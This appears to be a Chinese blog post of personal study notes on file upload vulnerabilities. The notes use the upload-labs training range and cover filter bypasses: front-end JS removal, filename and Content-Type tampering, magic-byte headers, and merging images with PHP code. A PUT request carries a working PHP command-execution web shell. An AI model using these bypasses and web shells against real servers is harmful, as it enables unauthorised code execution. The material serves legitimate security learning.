

<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
  <title>文件上传漏洞笔记 [ Soymilk ]</title>
  
<link rel="shortcut icon" href="/favicon/favicon.ico">


<link rel="stylesheet" href="/lib/highlight/railscasts.css">


<link rel="stylesheet" href="/lib/fancybox/jquery.fancybox.min.css">


<link rel="stylesheet" href="//code.jquery.com/ui/1.10.4/themes/smoothness/jquery-ui.css">

<link rel="stylesheet" href="https://cdn.staticfile.org/font-awesome/4.7.0/css/font-awesome.css">


<link rel="stylesheet" href="/css/milk.css">


<meta name="generator" content="Hexo 5.3.0"><link rel="alternate" href="/atom.xml" title="w啥都学" type="application/atom+xml">
</head>
<body>
  <div class="milk-header">
     

  <nav class="header-nav">
     
    <ul class="nav-menu">
      
        <li id="Home">
          <i class="fa fa-home" aria-hidden="true"></i>
          <a href="/ ">Home</a>
        </li>
      
        <li id="Archives">
          <i class="fa fa-archive" aria-hidden="true"></i>
          <a href="/archives ">Archives</a>
        </li>
      
        <li id="About">
          <i class="fa fa-user-circle" aria-hidden="true"></i>
          <a href="/about ">About</a>
        </li>
      
    </ul>
    
    
      <span class="nav-date">
        <i class="fa fa-calendar" aria-hidden="true"></i>
        <span id="date"></span>
      </span>
    
    
    
      <span class="nav-system" id="nav-system"></span>
    
    
    <span class="nav-access">
      <i class="fa fa-universal-access" id="nav-access"></i>
      <i class="fa fa-angle-down"></i>
      <div class="dropdown-content" id="dropdown-content">
        <ul class="social">
          
            <li>
              <a target="_blank" rel="noopener" href="https://github.com/MRsoymilk">
                <i class="fa fa-github-alt" aria-hidden="true"></i>
              </a>
            </li>
          
            <li>
              <a href="mailto:codermrsoymilk@gmail.com">
                <i class="fa fa-envelope" aria-hidden="true"></i>
              </a>
            </li>
          
        </ul>
        <ul>
          <li><span>Power by <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo</a></span></li>
        </ul>
      </div>
    </span>
  </nav>
 
  </div>
  <div class="milk-body">
    
<div class="draggable-toc">
  <div class="toc-title">文件上传漏洞笔记</div>
  <p>process: <span>0</span></p>
  <div class="progress-container">
    <div class="progress-bar" id="bar"></div>
  </div>
  <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#PUT-%E6%96%B9%E6%B3%95%E6%96%87%E4%BB%B6%E4%B8%8A%E5%8F%91"><span class="toc-text">PUT 方法文件上发</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BC%80%E5%90%AFPUT"><span class="toc-text">开启PUT</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9F%A5%E7%9C%8B%E6%9C%89%E6%B2%A1%E6%9C%89%E5%BC%80%E5%90%AFPUT%E8%AF%B7%E6%B1%82"><span class="toc-text">查看有没有开启PUT请求</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%94%A8PUT%E8%AF%B7%E6%B1%82%E4%B8%8A%E5%8F%91%E6%96%87%E4%BB%B6"><span class="toc-text">用PUT请求上发文件</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%89%8D%E7%AB%AF%E6%A3%80%E6%9F%A5%E7%BB%95%E8%BF%87"><span class="toc-text">前端检查绕过</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BF%AE%E6%94%B9%E6%96%87%E4%BB%B6%E5%90%8D%E7%BB%95%E8%BF%87"><span class="toc-text">修改文件名绕过</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E7%B1%BB%E5%9E%8B%E7%BB%95%E8%BF%87"><span class="toc-text">文件类型绕过</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BF%AE%E6%94%B9%E6%95%B0%E6%8D%AE%E5%8C%85%E7%9A%84%E5%86%85%E5%AE%B9%E7%BB%95%E8%BF%87"><span class="toc-text">修改数据包的内容绕过</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%B0%86%E7%85%A7%E7%89%87%E5%92%8Cwebshell%E5%90%88%E6%88%90%E7%BB%95%E8%BF%87"><span class="toc-text">将照片和webshell合成绕过</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%96%87%E4%BB%B6%E5%B9%BB%E6%9C%AF%E5%A4%B4%E7%BB%95%E8%BF%87"><span class="toc-text">文件幻术头绕过</span></a></li></ol>
</div>

<div class="post-content" id="post-content">
  <div id="top">文件上传漏洞笔记</div>
  <div class="post">
    
    <div class="content-categories">
      
      <i class="fa fa-location-arrow"></i>
      <ul>
        <li>categories</li>
        
          <li>&gt;</li>
          <li>
            <a href="/categories/web安全/">
          web安全
        </a>
          </li>
      
          <li>&gt;</li>
          <li>
            <a href="/categories/web安全/文件上传漏洞/">
          文件上传漏洞
        </a>
          </li>
      
      </ul>
    
    </div>
    <hr>
    
    <p><strong>教程看的<a target="_blank" rel="noopener" href="https://www.bilibili.com/video/BV1K741147FY">https://www.bilibili.com/video/BV1K741147FY</a>里面的有很多没有说直接绕过了就很烦，但是这个教程内容很丰富。教程里面修改东西的我也不知道什么意思他也不说就很烦，我就自己百度找然后都写到笔记里面了</strong></p>
<p>文件上传绕过思路在这个地方找到<a target="_blank" rel="noopener" href="https://www.bilibili.com/read/cv6978946/">https://www.bilibili.com/read/cv6978946/</a></p>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201227112040834.png" alt="image-20201227112040834"></p>
<h1 id="PUT-方法文件上发"><a href="#PUT-方法文件上发" class="headerlink" title="PUT 方法文件上发"></a>PUT 方法文件上发</h1><p>判断目标开没有开启PUT 方法</p>
<p>向指定资源位置上传其最新内容</p>
<h2 id="开启PUT"><a href="#开启PUT" class="headerlink" title="开启PUT"></a>开启PUT</h2><p>打开Apache配置文件<strong>httpd.conf</strong>，在上面添加</p>
<p>找到下面的然后叫注释去掉，加载<code>modules/mod_dav.so</code>和<code>modules/mod_dav_fs.so</code>模块</p>
<p><code>LoadModule</code>加载特定的DSO模块</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">#LoadModule dav_module modules&#x2F;mod_dav.so</span><br><span class="line">#LoadModule dav_fs_module modules&#x2F;mod_dav_fs.so</span><br></pre></td></tr></table></figure>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201224204819759.png" alt="image-20201224204819759"></p>
<p>添加<code>DAV On</code></p>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201224204845178.png" alt="image-20201224204845178"></p>
<p>在配置文件的最上面添加，<strong>注意一点要最上面</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">DavLockDB C:\phpStudy\PHPTutorial\WWW\a</span><br></pre></td></tr></table></figure>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201224205715704.png" alt="image-20201224205715704"></p>
<p>然后重启服务</p>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201224205814859.png" alt="image-20201224205814859"></p>
<h3 id="查看有没有开启PUT请求"><a href="#查看有没有开启PUT请求" class="headerlink" title="查看有没有开启PUT请求"></a>查看有没有开启PUT请求</h3><p>下面查看有什么方法里面是没有写PUT的请求的</p>
<p>在终端输入</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">telnet 服务器ip 端口</span><br></pre></td></tr></table></figure>
<p>然后在输入</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">OPTIONS &#x2F; HTTP&#x2F;1.1</span><br><span class="line">Host:  服务器的ip</span><br></pre></td></tr></table></figure>


<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201224211627382.png" alt="image-20201224211627382"></p>
<p>用nc也可以</p>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201224212126057.png" alt="image-20201224212126057"></p>
<h3 id="用PUT请求上发文件"><a href="#用PUT请求上发文件" class="headerlink" title="用PUT请求上发文件"></a>用PUT请求上发文件</h3><p>用burp发起PUT请求上发webshell到/a/a.php</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">PUT &#x2F;a&#x2F;a.php HTTP&#x2F;1.1</span><br><span class="line">Host: 192.168.31.160</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">&lt;?php</span><br><span class="line">system($_GET[&#39;cmd&#39;]);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>
<p>可以看见返回的是201</p>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201225192556437.png" alt="image-20201225192556437"></p>
<p>我们访问执行命令</p>
<p>可以看见执行了命令</p>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201225193001865.png" alt="image-20201225193001865"></p>
<h1 id="前端检查绕过"><a href="#前端检查绕过" class="headerlink" title="前端检查绕过"></a>前端检查绕过</h1><p>有web服务器，文件上发检查只在前端js来检查，如检查文件后缀名来判断上发的文件</p>
<p><strong>比如upload-labs的第一关</strong></p>
<p>下面是他的源代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">checkFile</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">    <span class="keyword">var</span> file = document.getElementsByName(<span class="string">&#x27;upload_file&#x27;</span>)[<span class="number">0</span>].value;</span><br><span class="line">    <span class="keyword">if</span> (file == <span class="literal">null</span> || file == <span class="string">&quot;&quot;</span>) &#123;</span><br><span class="line">        alert(<span class="string">&quot;请选择要上传的文件!&quot;</span>);</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">//定义允许上传的文件类型</span></span><br><span class="line">    <span class="keyword">var</span> allow_ext = <span class="string">&quot;.jpg|.png|.gif&quot;</span>;</span><br><span class="line">    <span class="comment">//提取上传文件的类型</span></span><br><span class="line">    <span class="keyword">var</span> ext_name = file.substring(file.lastIndexOf(<span class="string">&quot;.&quot;</span>));</span><br><span class="line">    <span class="comment">//判断上传文件类型是否允许上传</span></span><br><span class="line">    <span class="keyword">if</span> (allow_ext.indexOf(ext_name + <span class="string">&quot;|&quot;</span>) == <span class="number">-1</span>) &#123;</span><br><span class="line">        <span class="keyword">var</span> errMsg = <span class="string">&quot;该文件不允许上传，请上传&quot;</span> + allow_ext + <span class="string">&quot;类型的文件,当前文件类型为：&quot;</span> + ext_name;</span><br><span class="line">        alert(errMsg);</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>我们直接发送.php文件</p>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201224115337934.png" alt="image-20201224115337934"></p>
<p>看一下页面源代码</p>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201224114822127.png" alt="image-20201224114822127"></p>
<p>他会调用 checkFile()函数</p>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201224115024388.png" alt="image-20201224115024388"></p>
<p>我们只需要叫html的调用的标签删除就可以了</p>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201224115121029.png" alt="image-20201224115121029"></p>
<p>我把他删除</p>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201224115144045.png" alt="image-20201224115144045"></p>
<p>然后我们发照片</p>
<p>上传成功</p>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201224115220757.png" alt="image-20201224115220757"></p>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201224115234776.png" alt="image-20201224115234776"></p>
<h1 id="修改文件名绕过"><a href="#修改文件名绕过" class="headerlink" title="修改文件名绕过"></a>修改文件名绕过</h1><p><strong>比如upload-labs的第一关</strong></p>
<p>上发一个phpinfo.php文件里面内容</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">echo</span> phpinfo();</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>我们叫.php文件改成.png格式</p>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201226181232127.png" alt="image-20201226181232127"></p>
<p>改成png</p>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201226181407983.png" alt="image-20201226181407983"></p>
<p>用burp抓一下</p>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201226181518539.png" alt="image-20201226181518539"></p>
<p>叫文件名改.php</p>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201226181616786.png" alt="image-20201226181616786"></p>
<p>可以看见文件上传成功</p>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201226181657727.png" alt="image-20201226181657727"></p>
<p>访问地址</p>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201226181715424.png" alt="image-20201226181715424"></p>
<h1 id="文件类型绕过"><a href="#文件类型绕过" class="headerlink" title="文件类型绕过"></a>文件类型绕过</h1><p>下面这个照片的括住的就是文件的类型</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Content-Type: image&#x2F;png</span><br></pre></td></tr></table></figure>
<p>Content-Type:字段就是指定文件类型的<br><strong>image/png就是png类型的</strong></p>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201226182236835.png" alt="image-20201226182236835"></p>
<p>文件类型可以用<code>mimetype</code>命令来查看</p>
<p>格式 </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimetype 要查看的文件名</span><br></pre></td></tr></table></figure>
<p>咧</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mimetype phpinfo.php</span><br></pre></td></tr></table></figure>


<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201226190032426.png" alt="image-20201226190032426"><br>如果我们叫php文件名改成png用<code>mimetype</code>命令检查还是显示php类型<br>列</p>
<p>下面我叫<strong>phpinfo.php</strong>文件改成<strong>phpinfo.png</strong>文件</p>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201226190817584.png" alt="image-20201226190817584"></p>
<p>用<code>mimetype</code>来检查</p>
<p>可以看见还是php类型</p>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201226190958336.png" alt="image-20201226190958336"></p>
<p>下面是在百度上找到文件类型</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">*.php  		application&#x2F;x-php</span><br><span class="line">*.gif            image&#x2F;gif    </span><br><span class="line">*.html    text&#x2F;html    </span><br><span class="line">*.jpeg    image&#x2F;jpeg</span><br><span class="line">*.jpg          image&#x2F;jpeg    </span><br><span class="line">*.js       text&#x2F;javascript, application&#x2F;javascript    </span><br><span class="line">*.mp3    audio&#x2F;mpeg    </span><br><span class="line">*.mp4    audio&#x2F;mp4, video&#x2F;mp4    </span><br><span class="line">*.pdf    application&#x2F;pdf    </span><br><span class="line">*.png    image&#x2F;png    </span><br><span class="line">*.ppt    application&#x2F;vnd.ms-powerpoint    </span><br><span class="line">*.txt           text&#x2F;plain    </span><br><span class="line">*.xml    text&#x2F;xml, application&#x2F;xml    </span><br><span class="line">*.zip            aplication&#x2F;zip    </span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p><strong>演示在比如upload-labs的第二关</strong></p>
<p>上发一个phpinfo.php文件里面内容</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">echo</span> phpinfo();</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>他就会报文件类型不正确</p>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201226183750686.png" alt="image-20201226183750686"></p>
<p>用burp抓包叫文件名改成png</p>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201226183934420.png" alt="image-20201226183934420"></p>
<p>发现还是文件上传不正确</p>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201226184048804.png" alt="image-20201226184048804"></p>
<p>在选择一个php文件上传</p>
<p>用burp抓包，然后我们叫修改文件的类型改成<strong>image/png</strong> 就是<strong>png</strong>类型</p>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201226184146860.png" alt="image-20201226184146860"></p>
<p>然后文件上传成功</p>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201226184427789.png" alt="image-20201226184427789"></p>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201226184443032.png" alt="image-20201226184443032"></p>
<h1 id="修改数据包的内容绕过"><a href="#修改数据包的内容绕过" class="headerlink" title="修改数据包的内容绕过"></a>修改数据包的内容绕过</h1><p>有的过滤会检查文件内容每一个照片里面都有一个前面这个字段来代表文件类型<br>我们抓一个普通的照片上传文件的数据包</p>
<p>可以看见前面有一个PNG的字符串</p>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201226193145015.png" alt="image-20201226193145015"></p>
<p><strong>比如upload-labs的第十四关</strong></p>
<p>上发一个phpinfo.php文件里面内容</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">echo</span> phpinfo();</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>上发的时候用burp抓包如果叫文件名，和类型给修改成png格式的发现还是发不上去</p>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201226193531143.png" alt="image-20201226193531143"></p>
<p>然后我们发一个png文件叫里面的文件给文件内容全部给改成webshell只留下照片的内容头的部分</p>
<p>上传一个普通照片文件</p>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201227084637858.png" alt="image-20201227084637858"></p>
<p>用burp进行抓包</p>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201227084716612.png" alt="image-20201227084716612"></p>
<p>然后我们叫里面改成webshell只留下照片的内容头的部分</p>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201227084821816.png" alt="image-20201227084821816"></p>
<p>放包就上发上去了</p>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201227095004893.png" alt="image-20201227095004893"></p>
<p>但是是执行不了的应为他是png文件，可以通过其他的漏洞进行执行比如解析漏洞</p>
<h1 id="将照片和webshell合成绕过"><a href="#将照片和webshell合成绕过" class="headerlink" title="将照片和webshell合成绕过"></a>将照片和webshell合成绕过</h1><p>他会吧一个webshell的木马复制到照片里面，但是这个有一个问题就是当服务器解析照片的时候可能会受到照片的源码的内容应为webshell的运行</p>
<p>用<code>copy</code>命令</p>
<p>我们准备一个文件名叫phpinfo.php</p>
<p>内容</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">echo</span> phpinfo();</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>还有一个普通的照片名字zm9kpy.jpg</p>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201227100118849.png" alt="image-20201227100118849"></p>
<p>命令<code>copy /a zm9kpy.jpg + /b phpinfo.php = a.jpg</code></p>
<p>照片顺序不要搞错了不然就叫webshell代码插到最前面了</p>
<p>可以看见生成出来一个a.jpg文件</p>
<p>编辑出来的照片有的可能查看不了</p>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201227110046213.png" alt="image-20201227110046213"></p>
<p>教程上是这样写的不容易看懂</p>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201227100734663.png" alt="image-20201227100734663"></p>
<p>照片还是可以打开的</p>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201227110144969.png" alt="image-20201227110144969"></p>
<p>查看照片文件的源代码</p>
<p>可以看见已经插入上面了</p>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201227110517915.png" alt="image-20201227110517915"></p>
<p><strong>演示在比如upload-labs的第十四关</strong></p>
<p>用这个照片进行上传可以上传上去</p>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201227110633221.png" alt="image-20201227110633221"></p>
<p>复制照片的链接照片应为是jpg类型的所以执行不了，可以借用其他的漏洞来实现</p>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201227110938770.png" alt="image-20201227110938770"></p>
<p>我在服务器里面叫这个文件名手动改成php文件看看能不能执行</p>
<p>可以执行</p>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201227111542327.png" alt="image-20201227111542327"></p>
<h1 id="文件幻术头绕过"><a href="#文件幻术头绕过" class="headerlink" title="文件幻术头绕过"></a>文件幻术头绕过</h1><p>同照片的文件内容前几个自己都是相同的下面的16进制是在一个博客上<a target="_blank" rel="noopener" href="https://blog.csdn.net/Kevinhanser/article/details/81613003">https://blog.csdn.net/Kevinhanser/article/details/81613003</a>找的</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">jpg&#x3D;FF D8 FF E0 00 10 4A 46 49 46</span><br><span class="line">gif&#x3D;47 49 46 38 39 61</span><br><span class="line">png &#x3D; 89 50 4E 47</span><br></pre></td></tr></table></figure>
<p>我用burp抓一个jpg的数据包看一下16进行的头</p>
<p>可以看见是相通的</p>
<p><img src= "/img/loading2.gif" data-lazy-src="https://gitee.com/wZass/zp/raw/master/img/image-20201227114401188.png" alt="image-20201227114401188"></p>
<p><strong>演示在比如upload-labs的第十四关</strong></p>
<p>看看文件是否能上传上去</p>

    
    <hr>
    <div class="content-tags">
      
      <i class="fa fa-tags"></i>
      <ul>
        
        <li><a href="/tags/web安全/">
          web安全
        </a></li>
      
      </ul>
    
    </div>
    
     
<div class="comment-tabs" id="comment-tabs">
  comment:
  <ul>
    
      <li><a href="#Valine">Valine</a></li>
    
    
      <li><a href="#LiveRe">LiveRe</a></li>
    
    
      <li><a href="#ChangYan">ChangYan</a></li>
    
  </ul>
  
  
    <div id="ChangYan">
      <!--PC和WAP自适应版-->
      <div id="SOHUCS" ></div> 
      <script type="text/javascript"> 
      (function(){ 
      var appid = 'cyuGH4lBk'; 
      var conf = 'ae32d85e4ca99348209aedfd3ae01478'; 
      var width = window.innerWidth || document.documentElement.clientWidth; 
      if (width < 960) {
      var head = document.getElementsByTagName('head')[0]||document.head||document.documentElement;
      var script = document.createElement('script');
      script.type = 'text/javascript';
      script.charset = 'utf-8';
      script.id = 'changyan_mobile_js';
      script.src = 'https://cy-cdn.kuaizhan.com/upload/mobile/wap-js/changyan_mobile.js?client_id=' + appid + '&conf=' + conf;
      head.appendChild(script);
      } else { var loadJs=function(d,a){var c=document.getElementsByTagName("head")[0]||document.head||document.documentElement;var b=document.createElement("script");b.setAttribute("type","text/javascript");b.setAttribute("charset","UTF-8");b.setAttribute("src",d);if(typeof a==="function"){if(window.attachEvent){b.onreadystatechange=function(){var e=b.readyState;if(e==="loaded"||e==="complete"){b.onreadystatechange=null;a()}}}else{b.onload=a}}c.appendChild(b)};loadJs("https://cy-cdn.kuaizhan.com/upload/changyan.js",function(){window.changyan.api.config({appid:appid,conf:conf})}); } })(); 
      </script>
    </div>
   
  
  
    <div id="LiveRe">
      
        <!-- LiveRe City install code -->
        <div id="lv-container" data-id="city" data-uid="MTAyMC80NjA4MS8yMjU5Mg==">
          <script type="text/javascript">
            (function(d, s) {
              var j, e = d.getElementsByTagName(s)[0];
              if (typeof LivereTower === 'function') { return; }
              j = d.createElement(s);
              j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
              j.async = true;
              e.parentNode.insertBefore(j, e);
            })(document, 'script');
          </script>
          <noscript>Please activate JavaScript for write a comment in LiveRe</noscript>
          </div>
          <!-- completed City install code -->
        
    </div>
  
  
  
    <div id="Valine">
      <script src="//unpkg.com/valine/dist/Valine.min.js"></script>
      <div id="vcomments"></div>
      <script>
        new Valine({
          el: '#vcomments',
          appId: '5bHFwYPW2iHWCiV7WmNRSenk-gzGzoHsz',
          appKey: '2q4UgVDTmeJf9Phe8VbnNKyC',
          avatar: 'monsterid',
          enableQQ: true
        })
      </script>
    </div>
   
</div>

  </div>
</div>
 
<div>
  <button id="scroll2top">back to top</button>
</div>
  </div>
  

<script src="/lib/jquery/jquery.min.js"></script>


<script src="/lib/jquery/jquery-ui.min.js"></script>


<script src="/lib/fancybox/jquery.fancybox.min.js"></script>



<script src="/lib/highlight/highlight.pack.js"></script>

<script>
  hljs.highlightAll();
</script>


<script src="/js/milk.js"></script>


<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/koharu.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true},"react":{"opacityDefault":0.7,"opacityOnHover":0.8},"log":false});</script></body>
</html>
